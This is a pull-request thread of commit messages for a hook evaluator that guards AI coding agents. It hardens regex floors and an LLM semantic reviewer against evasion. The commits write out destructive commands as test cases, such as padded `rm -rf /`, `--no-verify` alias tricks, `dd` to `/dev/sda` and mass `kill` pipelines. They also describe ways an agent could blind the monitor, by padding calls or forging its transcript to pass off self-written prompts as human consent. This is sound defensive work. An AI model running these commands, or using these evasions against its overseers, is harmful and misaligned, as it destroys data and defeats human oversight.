feat(hooks): two-tier hook evaluator — a regex floor plus a semantic tier, off by default - #833
Conversation
Round-1 review: the privacy cases recorded what a real evaluation produces, so jevCleared always held policy names and jevModel the echoed model id. Shipping entry.jevCleared or entry.jevModel unsanitized to PostHog left the whole suite green. A row whose cleared list and model carry the command and the prompt (and names with a registered namespace mid-string) is now persisted, turned into PostHog properties and a request body, described and counted, and none of the marker words may appear. A companion case checks the one valid name still ships, so the check is not vacuous. Kills both reviewer mutants and the unanchored-namespace mutant. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…untested edges Round-1 review, minors: - Parity: the TS validators use JS `\s` / trim(), which count U+FEFF and not U+0085; Rust's trim / is_whitespace do the opposite. So "timeout" normalised to `timeout` in TS and `other` in Rust, "ab" was a policy name to Rust only, and a BOM-wrapped model id shipped from TS only. transform.rs now uses is_js_whitespace for the reason trim, the name check and the model trim. Same cases in hooks_jev.rs and a new TS twin (jev-whitespace-parity.test.ts). - A registered namespace mid-string (`cat /srv/custom/x y`) is pinned as not-a-name in TS and Rust; the unanchored-regex mutant now fails. - The allow roll-up's max latency is tested with non-monotonic values, and a negative latency is shown to feed neither the per-event field nor the aggregate mean (both reviewer mutants now fail). Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
… prompt shape, accept the §7 call shape - Codex IDE prompts: any prompt that opens with one of the IDE extension's own sections (# Selected text:, # Files mentioned by the user:, … as well as # Context from my IDE setup:) keeps only the text after the last "## My request for Codex:" or newer "## My request:" heading, and is dropped without one. A selection-only prompt used to be stored whole. - Pi: capture is gated. pi-extension forwards InputEvent.source as input_source, and a prompt counts only when it is "interactive" or "rpc"; another extension's sendUserMessage() and a bridge that forwards no source record nothing. - captureIntent accepts the §7 draft shape again (prompt, no payload): it is recorded for the harnesses that check no origin (Copilot, Cursor, Devin) and nothing is recorded for the rest. - recordUserPrompt redacts before it caps. - Tests: a long JWT split by either pre-cap cut, the line-boundary check, Codex agent_message events, docs cells, clock skew, corrupt session files, a Codex FIFO transcript, and Pi through the real bridge. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…e parser Round-1 review, minors: - jevStats()/computeJevStats() took any windowMs: NaN printed "last NaNs" and read every store page (the early stop compares against NaN), Infinity read the whole store, -1 printed "last 0s". clampJevStatsWindow now maps a window that is not a positive number to the 24 h default and caps anything longer (Infinity included) at 90 days; a non-finite `now` is the current time. - "honours a custom window" only checked the count, which the windowed store read gets right on its own; the new test also pins the reported windowMs, since and the "Activity (last 1h)" heading, so dropping windowMs from the computeJevStats call fails. - The clearsByPolicy / jevStats docs now say a renderer must print shadowClearsByPolicy too: on a shadow-mode machine every would-be clear is there and clearsByPolicy is empty (T1's jevStatsLines reads only the latter; flagged for integration). Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…, off switch, short-circuit Major: - Pi's `user_bash` (a command the HUMAN typed as `!cmd`) canonicalizes to PreToolUse and was reviewed by Jev as an agent request, so Jev's own deny could block the human's own command. The raw event is now checked and Jev is never started for it; the regex policies judge it exactly as before. - §4's truncation fallback did not survive T4: T4's intent store caps a stored prompt / agent message to fit inside the envelope's limit, omission mark included, so `envelope.truncated` never fires for it. `prepareSemantic` now also counts a sent `user_said` / `agent_last_message` carrying the cap's omission mark, and the outcome's `truncated` is that. Verified against jev-task/t4's real intent.ts (and t6's envelope.ts) in a scratch copy: the new end-to-end test passes there and fails there without the detection. - The FAILPROOFAI_EVALUATOR=legacy escape hatch is documented as what it is: read from the evaluating process's environment (one-shot hooks, or the worker's own environment). The daemon forwards event/cli/stdin/cwd only, so the machine-wide switch is the config file (`failproofai jev remove`, or mode "shadow"), read on every event. New worker-socket tests cover the daemon path: removing the config turns Jev off on the next hook with no restart, the worker's own env var is honoured, and a request cannot carry it. - A hard deny short-circuiting on the two-tier path is now tested directly (evaluator level and through the handler with a custom policy registered after the builtins and a Jev that never answers); mutant M1b is killed. Minor: - captureIntent skips a denied prompt only where the CLI enforces a UserPromptSubmit deny (ENFORCEMENT_CAPABILITY "block"); Goose, OpenCode and Antigravity only observe it, so their agent gets the prompt and it is passed. - "Jev config could not be read", "Jev review could not start" and "Jev intent capture failed" log at info, off the hook's stderr. - Tests: legacy under every configured mode is byte-identical to unconfigured; a pipelined request whose evaluation throws gets its error reply in order; evaluateSemantic with no transport never reads on-disk credentials or fetches; the equivalence corpus tests get an explicit 30 s timeout (assertions untouched). Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…ivity-tab wiring Round-1 review, minors: - A fallback where Jev did answer (truncated envelope, model mismatch) was described as "Jev unavailable: truncated" with Jev's verdict left out, and got the same plain pill as a timeout, while the collector ships the same row on its own as notable. describeJevActivity now says "Jev's answer not applied: <reason>", adds "Jev verdict (not applied): <decision>" and the model; a real outage still reads "Jev unavailable". jevPillKind gives a fallback whose unapplied verdict is stricter than what was enforced its own amber `fallback-stricter` pill (same label, own title). - No test rendered the activity table or detail panel with a Jev row, so dropping <JevPill> or <JevNote> from hooks-client.tsx went unnoticed. jev-activity-row.test.tsx renders the real HooksClient activity tab with a clear, a fallback and a non-Jev row; removing either line fails it. Whether dashboard visibility stays in T8 is left to the orchestrator. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…or it Codex's origin check reads the rollout's session_meta, and Codex does not put transcript_path on the hook's stdin: the file is discovered from the session id under ~/.codex/sessions, which does not honour CODEX_HOME. When discovery found nothing, codexRolloutIsSubagent read "no path" as "not a sub-agent" and the prompt was recorded — so a prompt the parent agent wrote for its sub-agent could become user_said and clear a reviewable policy. Fail closed instead, as the pi and openclaw cases already do for a missing mark, and say so in the per-harness table and Known limits. Also fold the agent_id hedge into one guard for all three Claude-shaped harnesses (claude, factory, devin), which all ship SubagentStop and so all have subagents; devin stays in NO_ORIGIN_CHECK, so the §7 draft call shape is unchanged. The OpenClaw row now says plainly that the shipped plugin forwards none of the three marks, so no OpenClaw prompt is recorded today. New tests pin each of these, plus the documented 4 MB transcript tail budget, which no test held to its value. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…config directory is checked `setup --key-from-env` deliberately writes a keyless jev.json. In any shell that does not set FAILPROOFAI_JEV_API_KEY — a new shell, and always the daemon — `inspectJevConfig` routed that file through the key check and reported it `refused`/`invalid`, so `jev status` printed "was refused" with exit 1 and told its owner to write a valid one: advice that undoes the only reason to choose --key-from-env, and a `status --json` that reads as a broken machine to a provisioning check. It is now its own state, `key-missing`, carrying the routing fields without the key. `jev status` renders it like `absent` (exit 0, "off in this shell"), `jev test` says which variable is unset instead of blaming the file, and `--json` reports provider, endpoint and `keySource: "env"` with `reason: "no-env-key"`. `loadJevConfig()` still returns null for it, so the hook path is unchanged. Validation stops at the missing key, so the loader re-validates with a stand-in before deciding: a keyless file that is also wrong further down is still `refused`. Also from the round: - The owner-only check covered the file but not its directory. A group/world-WRITABLE ~/.failproofai lets another local user unlink the 0600 file and leave their own, which every check then passed — and in enforce mode (the default) the endpoint they choose can clear a reviewable deny. The loader now refuses that with a `chmod 700` hint, and `jev setup` takes those write bits off a directory an older code path created at the umask. Read bits are left alone at both ends: they give nobody that power, and config.json beside it is world-readable by design. - The unknown-subcommand branch echoed its argument, so `failproofai jev <key>` printed the key — the one place the module broke its own rule. It is repeated only when it is shaped like a subcommand. - `jev status` printed `clearsByPolicy` alone, which is always empty in shadow mode; it now also prints T8's optional `shadowClearsByPolicy`. - Tests: the range/finiteness clamp in `readAnswers` was unpinned (both cases reached it through JSON, where NaN becomes null), as were OpenRouter's unversioned-alias and no-model answers. - Docs: the "never from the environment" guarantee is qualified — FAILPROOFAI_HOME relocates the whole layout rather than redirecting Jev. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Review round 2 of the hard-floor builtins. The same failure in three of them:
a word read with literalText alone, so a value the analyser CAN resolve walks
past a floor no reviewer can clear.
- block-no-verify: commitSkipsHooks/hasNoVerify resolve a non-literal argument
and test every candidate, parseGit resolves the subcommand and the global
options it used to give up on, and a `-c key=value` value is resolved before
it is judged. `F=--no-verify; git commit $F -m x`, `C=commit; git $C
--no-verify`, `git commit ${F:---no-verify}` and `P=/dev/null; git -c
core.hooksPath=$P commit` all deny; an unresolvable `git commit $ARGS` stays
allowed, and a resolved option that takes the next word still consumes it.
- block-gh-destructive: the noun and verb are resolved instead of read as "",
and an unresolved verb on a deletable noun denies the way `gh api -X $METHOD`
already did, rather than failing open.
- block-mass-kill: a filter now has to READ the PID variable (or a name derived
from it), so `if true; then kill $P; fi` and `[ 1 = 1 ]` no longer clear the
check, while the careful per-process loops still pass. Assignments in a
command prefix the parser hands to `then`/`do` are recovered, so the listing
behind `if …; then P=$(pgrep node); kill $P; fi` is seen. The filter test is
a per-analysis data-flow graph, so a command with one filtered PID variable
per kill stays linear.
- block-disk-destruction: a `dd` operand assembled whole in a variable
(`T=of=/dev/sda; dd if=/dev/zero $T`) is resolved before it reads as harmless.
Also: the pack's documented size moves 38 -> 44 in the two English docs pages
that state it, and copy-counts.test.ts now derives that number (and the
default-enabled 10) from the catalog so it cannot rot again; a test pins the
deliberate omission of the six floor builtins from the persona SIGNAL_MAP.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…etry keys, released-task deadline A cut in the context Jev judges is no longer read out of the context itself. `user_said` and `agent_last_message` are content — the agent writes the second one, and it repeats text from files and tool output that a third party controls — so a message that merely QUOTED the omission mark forced the call onto the regex-only path and threw Jev's verdict away: an off switch for the semantic tier that any repo file the agent summarised could pull, logged below the default level so nothing surfaced it. The store now says so itself: `SemanticOptions.contextTruncated`, read off `readIntent` through a local optional-field interface (the same defensive shape this file already uses for T5's `scope`), and believed exactly. With no word from the store, the mark alone is no longer enough — a message the store cut also fills the envelope's per-message cap, and a quoted mark in prose does not. A cut the envelope made itself counts as before, and nothing here can talk it away. Also: - Only `jev_`-prefixed keys of T8's telemetry helper are spread into `hook_policy_triggered`, so a key collision cannot overwrite a core property (`decision`, `policy_name`, …) silently and only on two-tier machines. - A task that hands the worker queue back early keeps a wedge deadline of its own instead of none. Clearing it at the release made every wedge past that point invisible: no exit, no respawn, and that connection's later replies queued behind it forever. `enqueue`'s body is now `runQueuedTask`, exported so the deadlines can be driven in a test without waiting a minute or exiting the runner. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…ract, linear assignment scan
Four verified review findings on the T6 redaction hardening.
1. BLOCKER — `redactAuthorizationField` accepted ANY word of up to 32
[A-Za-z0-9-] characters as an Authorization scheme and returned it
verbatim. A 25-character gateway key is exactly that shape, so
`{"Authorization": "<key> signature=…"}` sent the live key to Jev while
the envelope reported one redaction (the harmless second word). The value
this returns never goes through `redactSecrets`, so nothing downstream
caught it. Only a word from the same whitelist the text rule uses is kept
now (extended with `sso-key`/`ssws` to match `AUTHORIZATION_RE`); anything
else takes the whole value, and an unknown first word that is not even
token-shaped is left to the text rules so prose under the name survives.
2. MAJOR — the generic `sk-` entry opens with a consuming capture group (its
token boundary), and only `redactSecrets` put that character back.
`maskSecrets` in src/audit/redact-example.ts — the audit harm reporter,
which runs with Jev off — did a plain `.replace`, so it deleted the
character in front of every key it masked: `export OPENAI_API_KEY=<key>`
rendered as `export OPENAI_API_KEY[REDACTED: sk- API key]`, JSON lost its
opening quote, two lines merged where the boundary was a newline, and
`maskAssignedSecrets` could no longer see the assignment. Both consumers
now read one declared set, `SECRET_PATTERNS_KEEPING_PREFIX`, instead of
the `source.startsWith("(")` heuristic — which would also have re-emitted
the secret itself for a future entry whose first group captured part of it.
3. MAJOR — `redactSecrets` was quadratic in string length: `ASSIGNMENT_RE`'s
name could start at any character of a token, so a run with no separator
in it was consumed and backtracked at every position (35 ms for 4 000
characters). `buildEnvelope` redacts up to 576 capped strings, so an
ordinary batch of base64url blobs in tool input stalled the PreToolUse
path for 2-7 seconds before the Jev request even started. Both
`ASSIGNMENT_RE` and `FLAG_VALUE_RE` now require a token boundary in front
of the name, consumed and re-emitted as in `SK_GATEWAY_KEY_RE` (a
lookbehind costs the JIT and measured 5-10x slower here). Same envelope:
7 203 ms → 45 ms. A quoted value's closing quote is left to a lookahead so
it can still be the next assignment's boundary — no redaction is lost.
No total redaction budget was added: skipping a rule to meet a deadline
would mean shipping a secret.
4. MINOR — the generic `sk-` entry moves to the END of `API_KEY_PATTERNS`, so
`sanitize-api-keys` keeps reporting the specific vendor label when output
carries both a gateway key and a ghp_/AKIA/AIza key.
Tests: every one of these fails without its fix (verified by mutation). The
new shared-floor test pins, for all 16 entries and BOTH consumers at once,
that the marker lands exactly where the secret started — the invariant that
finding 2 broke and finding 5 warned about. The audit assertion that passed
over the defect is now whole-string equality plus the JSON, newline and
comma boundaries.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…nded The in-process copy of the FIFO check could not fail: a regression to a blocking open() hangs the vitest worker — its per-test timeout cannot interrupt a synchronous syscall — instead of failing the run. Measured: with OPEN_FLAGS reduced to a plain O_RDONLY the file was SIGKILLed at 100 s with no output at all, while the bounded child-process copy failed honestly in 11 s. Deleted the in-process case, whose behaviour the child harness already owns, and closed the class around it: - the harness now probes EVERY exported reader that opens the config file, the two `jev setup` / `jev status` update readers behind the module's second `openSync` included. Nothing covered those: a blocking open at that site would hang the CLI with the whole suite green. The probe redacts key fields, so nothing a reader returns can reach a failure message; - every `openSync` in the module must pass `OPEN_FLAGS`, with a count pin so a third reader cannot appear without extending the probe; - no test anywhere may create a FIFO and then call a reader in this process. Mutation-verified, each within seconds: a plain O_RDONLY for both sites, a plain O_RDONLY at the second site only, a third `openSync`, and an in-process FIFO test re-added under a throwaway name. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
§4 files a truncated envelope under "fall back to the regex result", and this branch read that as "throw Jev's answer away". The envelope's 2,000-character cap is tripped by the agent's own text, so that made padding a command a working way to stop Jev's OWN deny applying: `rm -rf / --no-preserve-root` plus 2,100 characters came back allow, and the same cap fires on an ordinary Write of ~2,100 characters, leaving the semantic tier inert on a large share of real calls in enforce mode (D2). Truncation now withdraws every CLEAR and nothing else. A clear resting on half of what the human typed is still not a clear, so every regex deny counts exactly as §4 asks, and the call is still recorded `jev-fallback` / `truncated` with Jev's decision — but Jev's own deny or instruct still joins the most-severe rule, because an answer given on part of the evidence can only ever ADD severity. The result is never less severe than the regex engine alone unless a clear fired. Closed structurally, not case by case: `JevReview`'s `fallback` variant no longer carries a `decision` at all, so a verdict Jev produced cannot be filed as "Jev did not answer" whatever trips next. A verdict on a cut envelope arrives as `answered` with `truncated: true`, and `answered` always reaches the merge. The three reasons Jev's picture is partial — truncated, injected, injection not asked — meet at one gate in `combineTwoTier`, so the next one added cannot take severity with it. Not narrowed instead: every accumulator that sets `truncated` cuts something a clear would rest on (a capped `content` hides secrets from the `secret-exposure` probe that reviews block-env-files just as a capped command hides its middle), so a narrower flag would be a forgeable clear. Also: the verdict log's `applied` for a truncated call is `two-tier`, not `legacy-fallback` — its verdict was applied, only its clears were not, and the row's own `truncated` records that. `policy-evaluator` no longer logs "jev unavailable" for the one reason that is not an outage. Tests: new __tests__/hooks/semantic/truncation-severity.test.ts runs the real evaluateSemantic -> toReview -> combineTwoTier path (the reviewer's padding repro, an oversized Write, and a control showing the same answer clears when uncut). combine.test.ts's exhaustive table gains an `enforceTruncated` column for the three rows where Jev outranks the regex result, plus a "nothing cleared => never more permissive" invariant asserted on all 144 cells. The T8 reason-code test now reads the ACTIVITY row, which is what ships. Verified by reverting the fix: 7 of the new assertions fail, and pass again restored. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Each of these ran a command the floor already denies, written a different way.
block-no-verify: expanding an inline alias re-read the body on its own and
dropped everything the enclosing `git` had set — including the `-c alias.*`
that names the NEXT alias, which is why `git -c alias.b=a -c alias.a='commit
--no-verify' b` allowed and why the `depth >= 2` guard written for exactly that
shape could never fire. The expansion now carries the invocation's `-c`
settings, `--config-env` keys and environment prefixes down with it (git puts
command-line `-c` in GIT_CONFIG_PARAMETERS, so a `!`-alias's own `git` sees
them too — checked against git 2.43), every definition of a name is checked
rather than the first (git takes the last), and the `export HUSKY=0` scan runs
over every analysis the walk read. Expansions are deduped and capped at four,
because N definitions at each of two levels was N² analyses.
block-mass-kill, `ps` chains: only grep counted as a filter, so the canonical
`ps aux | awk '/node/ {print $2}' | xargs kill` walked past the grep spelling
of the same command. awk, sed, perl and python now count too, reading a
selection-position pattern (an awk pattern or `~`/`==` comparison, a sed
address, a perl match) with the same weight as a grep pattern and every other
literal only against a generic name outright — so `sed 's/ +/ /g'` and
`awk '{print $1/$2}'` stay ordinary. Also denies the case no pattern describes:
a listing of every process with nothing on the chain able to drop a row.
block-mass-kill, patterns: pkill matches its pattern as a regex search over the
process name, but the check compared normalised strings, so `pkill nod`,
`pkill ode`, `pkill ytho` and `killall -r 'nod.*'` each reached exactly what the
literal name beside them reached. A non-exact pattern is now matched as a regex
against the generic names. The direction keeps it quiet on ordinary commands:
`pkill vite`, `pkill -f node.*worker` and `pkill 'nod$'` match none of them, and
`-x` still compares the whole name.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
All three findings were one shape: a check that decides from a file the agent can write, and reads "I could not read it" as "nothing to see". What reaches user_said is the only channel that can clear a reviewable policy, so missing evidence now fails closed. Claude Code and droid. modelScheduledPrompt became scheduledPromptVerdict, which answers scheduled / typed / unknown: "typed" needs at least one conversation entry to have parsed. truncate -s 0, rm, mv, a FIFO, chmod 000 and 4.7 MB of junk padding all recorded a CronCreate-scheduled prompt as the human's before this; none do now. The trade-off, and where the line is drawn. Requiring that evidence outright would cost every session its FIRST prompt — a real Claude Code transcript holds only session-start bookkeeping (mode, permission-mode, file-history-snapshot) at that moment, and `claude -p "…"` has no second prompt to fall back on. So a transcript with no conversation is believed exactly while the session has recorded nothing yet, which is the only state in which that is what an honest transcript looks like, and a prompt the model scheduled cannot be a session's first — scheduling one takes a turn. A harness that names no transcript at all is also not the agent hiding anything: that path comes from the hook payload, which the agent cannot edit. Residual, now documented: a session idle past the six-hour window loses its file to the sweep and counts as new again, and an agent writing plausible entries into its own transcript is not something reading it can catch. Codex. codexRolloutIsSubagent became codexRolloutOrigin — subagent / human / unknown. Round 4 closed only a missing rollout PATH; a path that resolved to a FIFO, /dev/null, a directory, an empty file, an unreadable one, or a first line that is not session_meta still read as "not a sub-agent", so a sub-agent's parent-written prompt was recorded. "human" now requires a session_meta carrying a source mark that names no sub-agent; a line with no source and no thread_source is unknown (real rollouts have carried one since 0.131 — checked against 40 on this machine, 0.131 through 0.154). No first-prompt exception here: Codex writes session_meta when the session starts, before any prompt. cleanHumanTurn. The two harness-text guards now run again on the request extracted from a Codex IDE prompt, via one harnessAuthored() helper. A stop gate's MANDATORY ACTION text, an "Instruction from failproofai:", a continuation summary, a peer session's <cross-session-message> or another of the extension's own sections placed after "## My request:" were all recorded verbatim as the human's task, contradicting what the page already promised. Tests: new intent-capture-r6.test.ts, one describe per finding, each case mutation-verified (eleven single-branch mutations, every one caught but the redundant read===0 guard, which was removed instead). The r4 Codex FIFO test now asserts the prompt is NOT recorded and covers /dev/null and mode 000 beside it — that test was added by this branch (e764934), so §5's ban on editing pre-existing tests does not reach it; base b766a94 has no intent tests at all. docs/reference/jev-intent.mdx: both table rows, the scheduled-prompt section, the IDE bullet and two Known limits, including the sentence that promised the opposite for an unreadable rollout. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…als, linear URL/PEM scans Five open findings, all reproduced first and each pinned by a test that fails without its fix. Authorization, both paths (blocker + 2 major). The rules decided on the FIRST WORD of the value, so a scheme this file does not list took the whole decision with it. On the structured path `redactAuthorizationField` asked whether that word looked like a token — false for any alphabetic word — and `Hawk id="…", mac="…"`, `NTLM <base64>`, `sessionid …` and `hmac dev-admin-key` went to Jev verbatim with `redactions: 0`. On the text path the credential group landed on the scheme word itself, so `curl -H "Authorization: Hawk …"` was untouched and `Authorization: xyz123 dev-admin-key` came back with the SCHEME redacted and the credential still in place, reporting a redaction for it. A multi-part value under a KNOWN scheme (`Digest username="…", response="…"`) leaked the same way. Both paths now decide on the whole value: a word outside AUTH_SCHEME_WORDS is part of the credential, and the text rule takes the rest of the header value rather than one token. The one shape that is not a credential is prose — three or more plain words — plus references, bare scheme words and, with no scheme in front of it, code (`const authorization = req.headers.authorization;`). The value stops at its opening quote's partner, at a command separator, at the next shell flag or at end of line, so a marker can never swallow the rest of a command and hide it from the evaluator. Quoted credential arguments (major). CLI_RULES and CONFIG_SET_RE dropped a quoted value whole, so `replacedPart` reported `'hunter2'` as the secret; `scrubKnownSecrets` searched the envelope for that and never found the bare copy the agent's own description carried. The quotes are re-emitted around the marker in all six rules, which is also how the command stays quoted as written. Quadratic scans (major). URL_CREDENTIALS_RE and URL_TOKEN_USERINFO_RE opened with `\b`, which matches after every `-`, `.` and `+` — every character `[a-z][a-z0-9+.-]*` can also consume — so the scheme group took the rest of a run and backtracked at each start: 45 ms for one 8 000-character `a-a-a-…` string, 1 701 ms for a full envelope of them. They get the consumed token-boundary group the assignment rules already use, plus a `://` guard. PEM_BLOCK_RE was the same family: its complete-block alternative is a lazy scan for `-----END`, so a text with no footer was read to the end from every header in it; footerless text now gets its own rule. Envelope: 1 701 ms -> 61 ms. The two cost fixtures that were meant to cover this could not: `run(n, ALNUM + "-")` stepped by `(i*7) % 63`, and gcd(7,63)=7, so it emitted nine distinct characters and never a hyphen. Step 5 is coprime with every alphabet used, and a test asserts each run contains its whole alphabet. Budgets were re-measured under the real runner and sized so the fixed and broken shapes are 20x apart on both sides, rather than the 1.77x the round-2 budget had. Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
Two ways were left to make Jev's verdict not apply, both reachable from the
tool call itself.
1. SIZE. `evaluateSemantic` returned `degraded("request-too-large")` when the
compiled request overran `MAX_REQUEST_CHARS`, and a degraded call is
`kind: "fallback"` — no verdict, the regex result stands. That is exactly
the outcome the truncation rule exists to prevent, reached by a different
spelling: one ignored 70,000-character `file_path` beside the command, or
24 x 24 x 1,500 characters of nested `tool_input` with every individual
string inside its cap. Repro at HEAD~1: `rm -rf / --no-preserve-root` alone
-> deny; the same call plus one long `file_path` key -> allow.
`facts` was the one part of the envelope with no caps at all — `extractPaths`
copies `file_path` / `path` / `notebook_path` verbatim and `buildEnvelope`
passed `as_written` / `resolved` straight through — which is what made the
budget reachable. Every string and list in the envelope now goes through
`cleanString` / a `keys` cap, so its size is a function of the caps rather
than of what the agent sent; `EnvelopeOptions.limits` makes those caps
settable, and `prepareSemantic` rebuilds an oversized call through
`SHRINK_STEPS` with `truncated` set instead of abandoning it. It then lands
on the rule installed in HEAD~1: clears withdrawn, Jev's own deny applied,
recorded `jev-fallback` / `truncated`. `request-too-large` survives only for
a request whose QUESTIONS overrun the budget — our text, not the caller's.
2. EVIDENCE JEV NEVER SAW. `prepareSemantic` sent
`userSaid.slice(-MAX_USER_MESSAGES)` in the envelope but handed `decideV1`
the FULL list. `targetNamedByUser` is a LOCAL check, and an `op-requested`
override needs it before a fired policy becomes `overridden` — which
`toReview` reports as a clear. So a human turn Jev never saw could supply
the consent that dropped a reviewable deny, with `truncated` false, so the
combine's one gate never saw it either; and it was stale consent, since a
long-past "delete X" went on licensing that target forever. `prepareSemantic`
now reads `user_said` and `agent_last_message` back OUT of the envelope and
judges against those, which closes it by construction: every cap the
envelope applies — including any added later — applies to the local check.
`decide` (v0) takes the same evidence.
`combine.ts` no longer claims a clear rests on a "complete" picture: the
three-turn window is a design constant, dropping older turns is not a cut, and
what is actually guaranteed is that nothing in the clearing half rests on
evidence that was not sent. Nothing about the §4 combine rules, unconfigured
equivalence or the per-CLI formatting changes.
Tests: `truncation-severity.test.ts` gains the budget spelling (each padding
shape answered rather than degraded, the dangerous suffix surviving every
shrink step, a cut call still clearing nothing, and a worst-case payload
proving the smallest step has room to spare) plus the `facts` caps;
`evaluator-sent-evidence.test.ts` is new (the dropped-turn repro in v1 and v0,
its equivalence to the turn never existing, and the structural invariant that
what is judged is what was sent); `two-tier-handler.test.ts` gains the
end-to-end guard the review asked for — every existing truncation test there
used a Jev ALLOW, so none of them would have caught Jev's deny being dropped
downstream of `combineTwoTier`: a padded call where the regex engine allows and
Jev denies is now pinned through the handler, the per-CLI formatters, the
activity row and telemetry, in enforce and in shadow.
Each new test was checked against the defect: with the shrink loop disabled,
the `facts` caps removed, the envelope-derived evidence reverted, or the
pre-HEAD~1 combine restored, they fail.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…on marked
Round 6 refused a prompt whose transcript could no longer be read. Both
blockers here are that hole reopened from the other side: what the check
reads is a file the agent writes.
A conversation is not hard to write. `printf '{"type":"user"}\n' > transcript`
parses, and so do four megabytes of well-formed turns appended after a
`scheduled_task_fire` entry — that one does not even destroy anything, it
just pushes the evidence past the 4 MB the check reads while the transcript
still looks honest to a human. Either way `scheduledPromptVerdict` answered
"typed" and a prompt the model wrote itself became `user_said`, which under
D1 clears warn-destructive-sql, block-work-on-main and warn-git-amend with
words the model chose.
So the transcript is now checked against what it has been, not only against
what it says. Every prompt-submit event of a harness that is checked this way
(Claude Code, droid) stores the transcript's device, inode, length and a
SHA-256 of the 64 KB before that length in the session's own 0600 file, and
the next prompt counts only while the transcript is that file, grown: same
inode, those bytes still where they were, and no more appended since the last
prompt than the check can read. Truncated, replaced, rewritten in place, or
grown past the read budget, it vouches for nothing — and the mark does not
move, so making the file read well again does not undo it. A single honest
turn larger than 4 MB costs that one prompt, not the session. "A conversation"
also now means a turn entry: a bookkeeping line carrying a `type` was enough
before.
The second blocker was the exception's scope. It was keyed on "this session
has recorded nothing yet", so any session whose opening turns were all
dropped — harness text, a stop-gate follow-up, an image-only prompt, an IDE
prompt with no request heading, or the model's own scheduled task in a
cron-started session — kept it alive for the rest of the session, one
`truncate` away from laundering a scheduled prompt. The mark is now written
for every prompt-submit event, recorded or not, and the exception asks
whether the session has been *seen*: it covers exactly one submission, which
is what the docs always claimed. The session file therefore outlives the
prompts in it and is swept after seven days of silence rather than six hours,
since losing it early hands the exception back to a session that is still
running.
What this does not do is authenticate the transcript's contents. An agent
that reproduces it byte for byte up to the point the last prompt was seen and
appends its own continuation still erases what it wrote in between; it has to
hit that point without being able to read the mark, and anything short of it
is a rewrite the next prompt refuses. The page says so rather than promising
more.
Tests: __tests__/hooks/semantic/intent-capture-r7.test.ts — every reported
spelling (truncate plus one turn line, a bare `{"type":"user"}`, a rewrite in
place, a replacement file, 4.2 MB of well-formed padding), the honest
directions that must keep working (append-only growth, a genuine first
prompt, one oversized turn costing one prompt), and the five openings that
used to keep the exception alive. Mutation-verified: dropping the identity or
digest check, the read-budget check, the mark-on-every-event write, the turn
check, or the vanished-path rule each fails these tests.
Three branch tests changed with the behaviour they pin, none weakened: two
now assert "no session file holds a prompt" instead of "no session file
exists" (a refused prompt leaves a mark by design), the five-prompt storage
test appends to its transcript instead of rewriting it each turn, the
agent-message test moves to a harness with no transcript check, and the
prune test moves to the retention window and gains a case for a file past the
intent window but inside it.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…tools do
Seven confirmation findings against the six hard-floor builtins, all in how
block-mass-kill and block-no-verify READ a command rather than in what they
decide once they have read it.
block-no-verify, git's own precedence:
- An alias named after a command git ships is dead text — git.c tries
handle_builtin() and the dashed externals before handle_alias(). Expanding
it anyway and stopping there let one `-c alias.commit=status` disarm every
`--no-verify`, `-n`, `core.hooksPath` and `HUSKY=0` spelling there is.
GIT_COMMANDS now models that precedence, in both directions: the real
subcommand is checked, and `-c alias.status='commit --no-verify' status`
stops being a false deny.
- An alias body the command string does not state now fails CLOSED, like the
`--config-env core.hooksPath` one line below it: `--config-env=alias.ci=E`
defines a working alias (checked against git 2.43) and was allowed, and a
`-c alias.ci="$B"` the resolver reads only part of (it takes the first word
of a `${X:-…}` default) hid a `--no-verify` the same way.
- Expanding an alias re-quotes its tail. `ShellWord.text` drops the quotes, so
the round-trip re-lexed a commit MESSAGE into flags and denied
`git -c alias.ci=commit ci -m 'do not use --no-verify here'`.
block-mass-kill, what a filter can actually do to a listing:
- An awk/sed/perl selector is no longer run through the grep-tuned
`broadPattern`. "Two characters or fewer" and "all metacharacters" describe a
pattern matched against a process NAME; `$2 ~ /^Z/`, `$2 ~ /:/` and `/^$/` are
tests over a line, and reading them as names denied nine ordinary pipelines
already narrowed to one app. A substitution's search text is dropped outright
— it cannot remove a row — and `index(…)`/`match(…)` arguments are now read.
- Header stripping moved INSIDE the every-process rule. It used to deny
`ps aux | awk '{print $2}'`, the one spelling that cannot work (kill aborts on
the literal `PID`), and allow `NR>1`, `tail -n +2`, `sed 1d`, a `cat`, a
`sort`, a `tee` and `grep -v`, every one of which kills the box.
- `ps` option arguments are consumed, not scanned: `ps -eopid=` is the same
listing as `ps -eo pid=` (424 lines each here), but the `p` of the output
FORMAT read as the `-p <pid>` selector, so one space turned a deny into an
allow.
- A pattern is compiled whole before the `|` split, POSIX classes are
translated, and `-i`/`-I` set the flag. Checked against procps-ng 4.0.4:
`pgrep 'n(o|0)de'`, `pgrep '[[:alpha:]]ode'` and `pgrep -i NOD` list what
`pgrep node` lists, and `-x` is a fully ANCHORED regex (`pgrep -x 'b.sh'`
matches bash, `pgrep -x bas` matches nothing) — so `-x` keeps the regex
reading instead of dropping to string equality.
Tests: seven new blocks in floor-policies-hardening.test.ts pinning every row
the reviewers demonstrated next to the near miss that must keep passing, plus a
bounded-cost pin for the new script reading. Verified each block fails against
the parent's floor-policies.ts.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
…ader PEM walk
The header rule now matches only the NAME with a regex and measures the value
